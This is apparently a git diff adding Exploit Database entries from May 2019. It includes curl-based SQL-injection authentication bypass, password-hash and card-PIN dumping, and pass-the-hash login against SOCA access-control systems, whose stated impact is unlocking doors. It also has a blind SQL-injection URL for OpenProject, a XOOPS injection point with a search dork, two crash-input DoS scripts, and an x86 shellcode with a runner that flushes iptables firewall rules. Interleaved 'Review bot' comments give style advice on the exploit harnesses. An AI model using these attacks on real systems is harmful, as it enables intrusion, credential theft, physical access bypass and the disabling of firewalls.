diff --git a/exploits/multiple/dos/46837.html b/exploits/multiple/dos/46837.html new file mode 100644 index 000000000..fe4c0599d --- /dev/null +++ b/exploits/multiple/dos/46837.html @@ -0,0 +1,242 @@ + + + \ No newline at end of file diff --git a/exploits/multiple/webapps/46820.txt b/exploits/multiple/webapps/46820.txt index 23e6c50cd..9043b15b7 100644 --- a/exploits/multiple/webapps/46820.txt +++ b/exploits/multiple/webapps/46820.txt @@ -1,4 +1,4 @@ -# Exploit Title: SSRF in TheHive Project Cortex <= 2.1.3 +# Exploit Title: Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery # Date: 2/26/2019 # Exploit Author: Alexandre Basquin # Vendor Homepage: https://blog.thehive-project.org @@ -9,12 +9,7 @@ # Exploit description -TheHive Project Cortex version <= 2.1.3 is vulnerable to a SSRF vulnerability in the "UnshortenLink_1_0" analyzer. - -References: - -https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/ - +The "UnshortenLink_1_0" analyzer used by Cortex contains an SSRF vulnerability POC: @@ -28,4 +23,10 @@ POC: 4. Result can be seen in the main dashboard. -Reported to TheHive Project by Alexandre Basquin on 1/24/2019 \ No newline at end of file +Reported to TheHive Project by Alexandre Basquin on 1/24/2019 + +The issue has been fixed in UnshortenLink 1.1 released within Cortex-analyzers 1.15.2 + +References: + +https://blog.thehive-project.org/2019/02/11/unshortenlink-ssrf-and-cortex-analyzers-1-15-2/ \ No newline at end of file diff --git a/exploits/php/webapps/46832.txt b/exploits/php/webapps/46832.txt new file mode 100644 index 000000000..9ac7f7c1a --- /dev/null +++ b/exploits/php/webapps/46832.txt 
@@ -0,0 +1,92 @@ +SOCA Access Control System 180612 Information Disclosure + + +Vendor: SOCA Technology Co., Ltd +Product web page: http://www.socatech.com +Affected version: 180612, 170000 and 141007 + +Summary: The company's products include proximity and fingerprint access +control system, time and attendance, electric locks, card reader and writer, +keyless entry system and other 30 specialized products. All products are +attractively designed with advanced technology in accordance with users' +safety and convenience which also fitted international standard. + +Desc: Insecure direct object references occur when an application provides +direct access to objects based on user-supplied input. As a result of this +vulnerability attackers can bypass authorization and access resources and +functionalities in the system. + +Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586 + Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 + Apache/2.2.22 (Win32) + PHP/5.4.13 + Firebird/InterBase DBMS + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5517 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5517.php + + +20.04.2018 + +-- + + +Authenticated users password hash disclosure via Get_Permissions_From_DB.php: +----------------------------------------------------------------------------- + +# curl -s http://10.0.0.3/Permission/Get_Permission_From_DB.php -H "Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" + +[{"Idx":1,"Id":"USER","Password":"4a7d1ed414474e4033ac29ccb8653d9b","Access":"ffffff00ff00ffffff00"},{"Idx":2,"Id":"soca","Password":"3c0d71fab22bc8703324e06d59a81700","Access":"ffffff00ff00ffffff00"}] + + +Unauthenticated users passwords (pins) disclosure via Ac10_ReadSortCard: +------------------------------------------------------------------------ + +# curl -X POST http://10.0.0.3/cgi-bin/Reader_Action.cgi/Ac10_ReadSortCard --data 
"Reader=%7B%22Idx%22%3A5%2C%22Model%22%3A502%2C%22Comm%22%3A%22TCP%2C10.0.0.3%2C4444%22%2C%22Timeout%22%3A1%2C%22SubNames%22%3A%7B%221%22%3A%22%22%2C%222%22%3A%22%22%2C%223%22%3A%22%22%2C%224%22%3A%22%22%2C%225%22%3A%22%22%2C%226%22%3A%22%22%2C%227%22%3A%22%22%2C%228%22%3A%22%22%7D%2C%22CreateTime%22%3A%222016-04-28+15%3A57%3A31%22%2C%22EditTime%22%3A%222018-12-26+17%3A14%3A37%22%2C%22Polling%22%3A1%2C%22Done%22%3Afalse%7D&Section=17" -s |grep Password |lolcat + +{"cmd":"readcard","success":true,"Reader":{"Idx":5,"Model":502,"SubNames": +{"8":"","7":"","6":"","5":"","4":"","3":"","2":"","1":""},"No":1,"Polling": +1,"EditTime":"2018-12-26 17:14:37","Name":"READER017","Done":false,"Comm":"TCP,10.0.0.3,4444", +"Timeout":1,"CreateTime":"2016-04-28 15:57:31"},"Section":17,"Cards":[ +{"Card":"3758236739","Password":"0000","Timezone":"1"},{"Card":"3758294894","Password":"0000","Timezone":"1"}, +{"Card":"3758393748","Password":"0000","Timezone":"1"},{"Card":"3758397434","Password":"0000","Timezone":"1"}, +{"Card":"3758526944","Password":"0000","Timezone":"1"},{"Card":"3758556239","Password":"0000","Timezone":"1"}, +{"Card":"3759183323","Password":"0000","Timezone":"1"},{"Card":"3759289453","Password":"0000","Timezone":"1"}, +{"Card":"3759444892","Password":"0000","Timezone":"1"},{"Card":"3759608121","Password":"0000","Timezone":"1"}, +{"Card":"3759700024","Password":"0000","Timezone":"1"},{"Card":"3760195859","Password":"0000","Timezone":"1"}, +{"Card":"3760330834","Password":"0000","Timezone":"1"},{"Card":"3760455789","Password":"0000","Timezone":"1"}, +{"Card":"3760493498","Password":"0000","Timezone":"1"},{"Card":"3760555917","Password":"0000","Timezone":"1"}, +{"Card":"3760674062","Password":"0000","Timezone":"1"},{"Card":"3761256706","Password":"0000","Timezone":"1"}, +{"Card":"3761275358","Password":"0000","Timezone":"1"},{"Card":"3761386285","Password":"0000","Timezone":"1"}, 
+{"Card":"3761398620","Password":"0000","Timezone":"1"},{"Card":"3761452653","Password":"0000","Timezone":"1"}, +{"Card":"3761514319","Password":"0000","Timezone":"1"},{"Card":"3761543092","Password":"0000","Timezone":"1"}, +{"Card":"3761766657","Password":"0000","Timezone":"1"},{"Card":"3761783860","Password":"0000","Timezone":"1"}, +{"Card":"3762311449","Password":"0000","Timezone":"1"},{"Card":"3762313335","Password":"0000","Timezone":"1"}, +{"Card":"3762328203","Password":"0000","Timezone":"1"},{"Card":"3762384973","Password":"0000","Timezone":"1"}, +{"Card":"3762647673","Password":"0000","Timezone":"1"},{"Card":"3762688310","Password":"0000","Timezone":"1"}, +{"Card":"3762771467","Password":"0000","Timezone":"1"},{"Card":"3762827566","Password":"0000","Timezone":"1"}, +{"Card":"3762843960","Password":"0000","Timezone":"1"},{"Card":"3762910530","Password":"0000","Timezone":"1"}, +{"Card":"3763344650","Password":"0000","Timezone":"1"},{"Card":"3763417869","Password":"0000","Timezone":"1"}, +{"Card":"3763492897","Password":"0000","Timezone":"1"},{"Card":"3763734440","Password":"0000","Timezone":"1"}, +{"Card":"3763865189","Password":"0000","Timezone":"1"},{"Card":"3763889211","Password":"0000","Timezone":"1"}, +{"Card":"3764619719","Password":"0000","Timezone":"1"},{"Card":"3764811544","Password":"0000","Timezone":"1"}, +{"Card":"3764846862","Password":"0000","Timezone":"1"},{"Card":"3765568542","Password":"0000","Timezone":"1"}, +{"Card":"3765790491","Password":"0000","Timezone":"1"},{"Card":"3765917518","Password":"0000","Timezone":"1"}, +{"Card":"3765962614","Password":"0000","Timezone":"1"},{"Card":"3765978672","Password":"0000","Timezone":"1"}, +{"Card":"3766032648","Password":"0000","Timezone":"1"},{"Card":"3766498811","Password":"0000","Timezone":"1"}, +{"Card":"3766625241","Password":"0000","Timezone":"1"},{"Card":"3766970803","Password":"0000","Timezone":"1"}, 
+{"Card":"3767105946","Password":"0000","Timezone":"1"},{"Card":"3767601584","Password":"0000","Timezone":"1"}, +... +... +... + + +phpinfo() disclosure: +--------------------- + +# curl -s http://10.0.0.3/phpinfo.php \ No newline at end of file diff --git a/exploits/php/webapps/46833.txt b/exploits/php/webapps/46833.txt new file mode 100644 index 000000000..9ec0bf62a --- /dev/null +++ b/exploits/php/webapps/46833.txt 
@@ -0,0 +1,137 @@ +SOCA Access Control System 180612 SQL Injection And Authentication Bypass + + +Vendor: SOCA Technology Co., Ltd +Product web page: http://www.socatech.com +Affected version: 180612, 170000 and 141007 + +Summary: The company's products include proximity and fingerprint access +control system, time and attendance, electric locks, card reader and writer, +keyless entry system and other 30 specialized products. All products are +attractively designed with advanced technology in accordance with users' +safety and convenience which also fitted international standard. + +Desc: The Soca web access control system suffers from multiple SQL Injection +vulnerabilities. Input passed via multiple POST parameters is not properly +sanitised before being returned to the user or used in SQL queries. This +can be exploited to manipulate SQL queries by injecting arbitrary SQL code +and bypass the authentication mechanism. It allows the attacker to remotely +disclose password hashes and login with MD5 hash with highest privileges +resulting in unlocking doors and bypass the physical access control in place. 
+ +Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586 + Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 + Apache/2.2.22 (Win32) + PHP/5.4.13 + Firebird/InterBase DBMS + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5519 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5519.php + + +20.04.2018 + +-- + + +Authentication bypass / SQL injection via pos_id POST parameter in Login.php: +----------------------------------------------------------------------------- +-version 141007 + +# curl -X POST --data "pos_id=' or 1=1--&pos_pw=whatever&Lang=eng" -i\ +"http://10.0.0.4/Login/Login.php" + +HTTP/1.1 200 OK +Date: Fri, 03 May 2018 13:37:25 GMT +Server: Apache/2.2.22 (Win32) PHP/5.4.13 +X-Powered-By: PHP/5.4.13 +Set-Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 +Pragma: no-cache +Content-Length: 5 +Content-Type: text/html + + true + + +Authentication bypass / SQL injection via ID POST parameter in Login.php: +========================================================================= +-version 180612 + +# curl -X POST --data "ID=' or 1=1--&PW=whatever&Lang=eng"\ +"http://10.0.0.3/Login/Login.php" + +{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"' or 1=1--","sess_passwd":"008c5926ca861023c1d2a36653fd88e2","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}} + + +Authenticated SQL injection via cidx POST parameter in Card_Edit_GetJson.php: +============================================================================= + +Dump current user: +------------------ + +# curl -X POST --data "cidx=144 and 1=(user)"\ 
+"http://10.0.0.3/Card/Card_Edit_GetJson.php"\ +-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" + +Warning: ibase_fetch_assoc(): conversion error from string "SYSDBA"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 + +Dump table: +----------- + +# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields)"\ +"http://10.0.0.3/Card/Card_Edit_GetJson.php"\ +-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" + +Warning: ibase_fetch_assoc(): conversion error from string "USERS"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 + +Dump column: +------------ + +# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+57+distinct+rdb$relation_name+from+rdb$relation_fields))"\ +"http://10.0.0.3/Card/Card_Edit_GetJson.php"\ +-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" + +Warning: ibase_fetch_assoc(): conversion error from string "U_NAME"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 + +Dump column: +------------ + +# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+2+distinct+rdb$field_name+from+rdb$relation_fields where rdb$relation_name=(select+first+1+skip+56+distinct+rdb$relation_name+from+rdb$relation_fields))"\ +"http://10.0.0.3/Card/Card_Edit_GetJson.php"\ +-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" + +Warning: ibase_fetch_assoc(): conversion error from string "U_PASSWORD"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 + +Dump username and Idx from USERS table: +--------------------------------------- + +# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_NAME || U_IDX+from+USERS)"\ +"http://10.0.0.3/Card/Card_Edit_GetJson.php"\ +-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" + +Warning: ibase_fetch_assoc(): conversion error from string "USER1"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 + +Dump passwords from UAC table: 
+------------------------------ + +# curl -X POST --data "cidx=144 and 1=(select+first+1+skip+0+U_PASSWORD+from+UAC)"\ +"http://10.0.0.3/Card/Card_Edit_GetJson.php"\ +-H Cookie: PHPSESSID=u412baebe2uogds21apgcsvhr6" + +Warning: ibase_fetch_assoc(): conversion error from string "4a7d1ed414474e4033ac29ccb8653d9b"; in C:\SOCA\WebSite\Card\Card_Edit_GetJson.php on line 17 + + +Login with MD5: +=============== + +# curl -X POST --data "ID=USER&PW=4a7d1ed414474e4033ac29ccb8653d9b&Lang=eng" +"http://10.0.0.3/Login/Login.php"\ + +{"LoginCheck":true,"Session":{"IP":"10.0.0.9","sess_Lang":"eng","sess_id":"USER","sess_passwd":"4a7d1ed414474e4033ac29ccb8653d9b","sess_Access":{"Reader":1,"User":1,"Card":1,"Groups":1,"Historys":1,"Special_Query":1,"Permission":1,"WorkGroup":1,"Attend":1,"WorkTime":1,"Dep":1,"Holiday":1,"ConvertHistory":1,"Backup_Database":1,"Auto_Update_Card":1,"Mail_Report":1}}} \ No newline at end of file diff --git a/exploits/php/webapps/46834.txt b/exploits/php/webapps/46834.txt new file mode 100644 index 000000000..467d243ef --- /dev/null +++ b/exploits/php/webapps/46834.txt 
@@ -0,0 +1,46 @@ +SOCA Access Control System 180612 CSRF Add Admin Exploit + + +Vendor: SOCA Technology Co., Ltd +Product web page: http://www.socatech.com +Affected version: 180612, 170000 and 141007 + +Summary: The company's products include Proximity and Fingerprint access +control system, Time and Attendance, Electric Locks, Card reader and writer, +keyless entry system and other 30 specialized products. All products are +attractively designed with advanced technology in accordance with users' +safety and convenience which also fitted international standard. + +Desc: The application interface allows users to perform certain actions via +HTTP requests without performing any validity checks to verify the requests. +This can be exploited to perform certain actions with administrative privileges +if a logged-in user visits a malicious web site. + +Tested on: Windows NT 6.1 build 7601 (Windows 7 Service Pack 1) i586 + Windows NT 6.2 build 9200 (Windows Server 2012 Standard Edition) i586 + Apache/2.2.22 (Win32) + PHP/5.4.13 + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2019-5520 +Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2019-5520.php + + +20.04.2018 + +-- + + + + + +
+ + +
+ + \ No newline at end of file diff --git a/exploits/php/webapps/46835.txt b/exploits/php/webapps/46835.txt new file mode 100644 index 000000000..3c22c7fc5 --- /dev/null +++ b/exploits/php/webapps/46835.txt @@ -0,0 +1,24 @@ +[+] Sql Injection on XOOPS CMS v.2.5.9 + +[+] Date: 12/05/2019 + +[+] Risk: High + +[+] CWE Number : CWE-89 + +[+] Author: Felipe Andrian Peixoto + +[+] Vendor Homepage: https://xoops.org/ + +[+] Contact: felipe_andrian@hotmail.com + +[+] Tested on: Windows 7 and Gnu/Linux + +[+] Dork: inurl:gerar_pdf.php inurl:modules // use your brain ;) + +[+] Exploit : + + http://host/patch/modules/patch/gerar_pdf.php?cid= [SQL Injection] + + +[+] EOF \ No newline at end of file diff --git a/exploits/php/webapps/46838.txt b/exploits/php/webapps/46838.txt new file mode 100644 index 000000000..5b2028025 --- /dev/null +++ b/exploits/php/webapps/46838.txt 
@@ -0,0 +1,118 @@ +SEC Consult Vulnerability Lab Security Advisory < 20190510-0 > +======================================================================= + title: Unauthenticated SQL Injection vulnerability + product: OpenProject + vulnerable version: 5.0.0 - 8.3.1 + fixed version: 8.3.2 & 9.0.0 + CVE number: CVE-2019-11600 + impact: Critical + homepage: https://www.openproject.org + found: 2019-04-17 + by: T. Soo (Office Bangkok) + SEC Consult Vulnerability Lab + + An integrated part of SEC Consult + Europe | Asia | North America + + https://www.sec-consult.com + +======================================================================= + +Vendor description: +------------------- +"OpenProject is the leading open source project management software. +Support your project management process along the entire project +life cycle: From project initiation to closure." + +Source: https://www.openproject.org/ + + +Business recommendation: +------------------------ +The vendor provides a patch which should be applied immediately. + +An in-depth security analysis performed by security professionals is +highly advised, as the software may be affected from further security issues. + + +Vulnerability overview/description: +----------------------------------- +An SQL injection vulnerability has been identified in the web "activities API". +An unauthenticated attacker could successfully perform an attack to extract +potentially sensitive information from the database if OpenProject is configured +not to require authentication for API access. 
+ + +Proof of concept: +----------------- +Requesting the following URL will trigger a time delay as a proof of concept +for exploiting the blind SQL injection: +http:///api/v3/activities/1)%20AND%203281%3d(SELECT%203281%20FROM%20PG_SLEEP(1))%20AND%20(7777%3d7777 + + +Vulnerable / tested versions: +----------------------------- +The vulnerability has been identified in OpenProject version 8.3.1 which +was the most current version at the time of discovery. + +According to the vendor all versions between 5.0.0 and 8.3.1 are affected. +Older versions (< 5.0.0) are not vulnerable. + + +Vendor contact timeline: +------------------------ +2019-04-30: Contacting vendor through security@openproject.com +2019-04-30: A patch is published in version 8.3.2 +2019-05-06: Vendor publishes further details +2019-05-10: Release of security advisory + + +Solution: +--------- +The vendor provides a patched version 8.3.2 and a security notice with further +information: + +https://www.openproject.org/release-notes/openproject-8-3-2 +https://groups.google.com/forum/#!msg/openproject-security/XlucAJMxmzM/hESpOaFVAwAJ + + +Workaround: +----------- +None + + +Advisory URL: +------------- +https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html + + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + +SEC Consult Vulnerability Lab + +SEC Consult +Europe | Asia | North America + +About SEC Consult Vulnerability Lab +The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It +ensures the continued knowledge gain of SEC Consult in the field of network +and application security to stay ahead of the attacker. The SEC Consult +Vulnerability Lab supports high-quality penetration testing and the evaluation +of new offensive and defensive technologies for our customers. Hence our +customers obtain the most current information about vulnerabilities and valid +recommendation about the risk profile of new technologies. 
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+Interested to work with the experts of SEC Consult?
+Send us your application https://www.sec-consult.com/en/career/index.html
+
+Interested in improving your cyber security with the experts of SEC Consult?
+Contact our local offices https://www.sec-consult.com/en/contact/index.html
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
+Mail: research at sec-consult dot com
+Web: https://www.sec-consult.com
+Blog: http://blog.sec-consult.com
+Twitter: https://twitter.com/sec_consult
+
+EOF Thanaphon Soo / @2019
\ No newline at end of file
diff --git a/exploits/windows/dos/46830.py b/exploits/windows/dos/46830.py
new file mode 100755
index 000000000..70b49220c
--- /dev/null
+++ b/exploits/windows/dos/46830.py
@@ -0,0 +1,22 @@
+#Exploit Title: SpotMSN 2.4.6 - 'Name/Key' Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-12
+#Vendor Homepage: www.nsauditor.com
+#Software Link: http://www.nsauditor.com/downloads/spotmsn_setup.exe
+#Tested Version: 2.4.6
+#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: SpotMSN_2.4.6.py
+#2.- Open SpotMSN.txt and copy content to clipboard
+#3.- Open SpotMSN
+#4.- Select "Register" > "Enter Registration Code..."
+#5.- In "Name/Key" paste Clipboard
+#6.- Click "Ok"
+#7.- Crarshed
+
+cod = "\x41" * 300
+
+f = open('SpotMSN.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/exploits/windows/dos/46831.py b/exploits/windows/dos/46831.py
new file mode 100755
index 000000000..7156e9c1a
--- /dev/null
+++ b/exploits/windows/dos/46831.py
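Review bot: The file handle in the 46830.py hunk is opened and closed by hand (`f = open('SpotMSN.txt', 'w')` … `f.close()`); the idiomatic form is `with open('SpotMSN.txt', 'w') as f:` followed by `    f.write(cod)`, which closes the file even if the write raises. The same applies to the 46831.py hunk, which differs only in the filename and the header comments. The step-7 comment reads `#7.- Crarshed`, a typo for `Crashed`, and step 1 names the script `SpotMSN_2.4.6.py` whereas the committed file is `46830.py`; adjusting both keeps the reproduction notes consistent with what the repository ships.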
@@ -0,0 +1,22 @@
+#Exploit Title: DNSS Domain Name Search Software 2.1.8 - Denial of Service (PoC)
+#Discovery by: Victor Mondragón
+#Discovery Date: 2019-05-12
+#Vendor Homepage: www.nsauditor.com
+#Software Link: http://www.nsauditor.com/downloads/dnss_setup.exe
+#Tested Version: 2.1.8
+#Tested on: Windows Windows 10 Single Language x64 / 7 x64 Service Pack 1
+
+#Steps to produce the crash:
+#1.- Run python code: DNSS_2.1.8.py
+#2.- Open DNSS.txt and copy content to clipboard
+#3.- Open Dnss
+#4.- Select "Register" > "Enter Registration Code..."
+#5.- In "Name/Key" paste Clipboard
+#6.- Click "Ok"
+#7.- Crarshed
+
+cod = "\x41" * 300
+
+f = open('DNSS.txt', 'w')
+f.write(cod)
+f.close()
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 7e9706243..3dc6fb404 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -6419,6 +6419,9 @@ id,file,description,date,author,type,platform,port
 46822,exploits/windows/dos/46822.py,"SpotPaltalk 1.1.5 - Denial of Service (PoC)",2019-05-10,"Alejandra Sánchez",dos,windows,
 46823,exploits/windows/dos/46823.py,"ASPRunner.NET 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
 46824,exploits/windows/dos/46824.py,"PHPRunner 10.1 - Denial of Service (PoC)",2019-05-10,"Victor Mondragón",dos,windows,
+46830,exploits/windows/dos/46830.py,"SpotMSN 2.4.6 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
+46831,exploits/windows/dos/46831.py,"DNSS 2.1.8 - Denial of Service (PoC)",2019-05-13,"Victor Mondragón",dos,windows,
+46837,exploits/multiple/dos/46837.html,"Google Chrome V8 - Turbofan JSCallReducer::ReduceArrayIndexOfIncludes Out-of-Bounds Read/Write",2019-05-13,"Google Security Research",dos,multiple,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -41250,8 +41253,13 @@ id,file,description,date,author,type,platform,port
 46804,exploits/multiple/webapps/46804.txt,"Prinect Archive System 2015 Release 2.6 - Cross-Site Scripting",2019-05-07,alt3kx,webapps,multiple,80
 46811,exploits/linux/webapps/46811.txt,"NetNumber Titan ENUM/DNS/NP 7.9.1 - Path Traversal / Authorization Bypass",2019-05-08,MobileNetworkSecurity,webapps,linux,
 46815,exploits/php/webapps/46815.txt,"Zoho ManageEngine ADSelfService Plus 5.7 < 5702 build - Cross-Site Scripting",2019-05-09,"Ibrahim Raafat",webapps,php,
-46820,exploits/multiple/webapps/46820.txt,"TheHive Project Cortex < 1.15.2 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,
+46820,exploits/multiple/webapps/46820.txt,"Cortex Unshortenlink Analyzer < 1.1 - Server-Side Request Forgery",2019-05-10,"Alexandre Basquin",webapps,multiple,
 46825,exploits/jsp/webapps/46825.txt,"dotCMS 5.1.1 - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,jsp,
 46826,exploits/hardware/webapps/46826.txt,"RICOH SP 4510DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
 46827,exploits/hardware/webapps/46827.txt,"RICOH SP 4520DN Printer - HTML Injection",2019-05-10,"Ismail Tasdelen",webapps,hardware,
 46828,exploits/multiple/webapps/46828.txt,"CyberArk Enterprise Password Vault 10.7 - XML External Entity Injection",2019-05-10,"Marcelo Toran",webapps,multiple,
+46832,exploits/php/webapps/46832.txt,"SOCA Access Control System 180612 - Information Disclosure",2019-05-13,LiquidWorm,webapps,php,
+46833,exploits/php/webapps/46833.txt,"SOCA Access Control System 180612 - SQL Injection",2019-05-13,LiquidWorm,webapps,php,80
+46834,exploits/php/webapps/46834.txt,"SOCA Access Control System 180612 - Cross-Site Request Forgery (Add Admin)",2019-05-13,LiquidWorm,webapps,php,
+46835,exploits/php/webapps/46835.txt,"XOOPS 2.5.9 - SQL Injection",2019-05-13,"felipe andrian",webapps,php,80
+46838,exploits/php/webapps/46838.txt,"OpenProject 5.0.0 - 8.3.1 - SQL Injection",2019-05-13,"SEC Consult",webapps,php,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index f3f795aff..958f46a00 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -964,3 +964,4 @@ id,file,description,date,author,type,platform
 46800,shellcodes/generator/46800.txt,"Linux/x86 - Multiple keys XOR Encoder / Decoder execve(/bin/sh) Shellcode (59 bytes)",2019-05-06,"Xavi Beltran",shellcode,generator
 46801,shellcodes/linux_x86/46801.txt,"Linux/x86 - shred file Shellcode (72 bytes)",2019-05-06,strider,shellcode,linux_x86
 46809,shellcodes/linux_x86/46809.c,"Linux/x86 - execve /bin/sh Shellcode (20 bytes)",2019-05-08,Rajvardhan,shellcode,linux_x86
+46829,shellcodes/linux_x86/46829.c,"Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)",2019-05-13,"Xavi Beltran",shellcode,linux_x86
diff --git a/shellcodes/linux_x86/46829.c b/shellcodes/linux_x86/46829.c
new file mode 100644
index 000000000..3d5d97401
--- /dev/null
+++ b/shellcodes/linux_x86/46829.c
@@ -0,0 +1,52 @@
+# Title: Linux/x86 - /sbin/iptables -F Shellcode (43 bytes)
+# Author: Xavi Beltran
+# Date: 11/05/2019
+# Contact: xavibeltran@protonmail.com
+# Webpage: https://xavibel.com
+# Purpose: flush iptables rules
+# Tested On: Ubuntu 3.5.0-17-generic
+# Arch: x86
+# Size: 43 bytes
+
+#################################### iptables-flush.nasm ####################################
+
+global _start
+
+section .text
+_start:
+ xor eax, eax
+ push eax
+ push word 0x462d
+ mov esi, esp
+ push eax
+ push dword 0x73656c62
+ push dword 0x61747069
+ mov edi,esp
+ push dword 0x2f2f6e69
+ push dword 0x62732f2f
+ mov ebx, esp
+ push eax
+ push esi
+ push edi
+ mov ecx, esp
+ mov al, 11
+ int 0x80
+
+####################################### shellcode.c #######################################
+
+#include
+#include
+
+unsigned char code[] = \
+"\x31\xc0\x50\x66\x68\x2d\x46\x89\xe6\x50\x68\x62\x6c\x65\x73\x68\x69\x70\x74\x61\x89\xe7\x68\x69\x6e\x2f\x2f\x68\x2f\x2f\x73\x62\x89\xe3\x50\x56\x57\x89\xe1\xb0\x0b\xcd\x80";
+
+main()
+{
+
+ printf("Shellcode Length: %d\n", strlen(code));
+
+ int (*ret)() = (int(*)())code;
+
+ ret();
+
+}
\ No newline at end of file
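Review bot: The test harness in the 46829.c hunk declares `main()` with no return type, relying on implicit `int`, which C99 removed, and it prints `strlen(code)` — a `size_t` — with `%d`, a format/argument mismatch that is undefined behaviour; the two lines should read `int main(void)` and `printf("Shellcode Length: %zu\n", strlen(code));`. The two `#include` lines appear to have lost their header names in this rendering (presumably `<stdio.h>` and `<string.h>`, which `printf` and `strlen` need), so it is worth confirming the committed file still carries them. As committed, the `.c` file also holds the `# Title:` metadata block and the NASM listing ahead of the C code, so the preprocessor rejects it as a translation unit; a one-line comment at the `shellcode.c` banner saying that only the section below it is meant to be compiled would spare the next reader a confusing error.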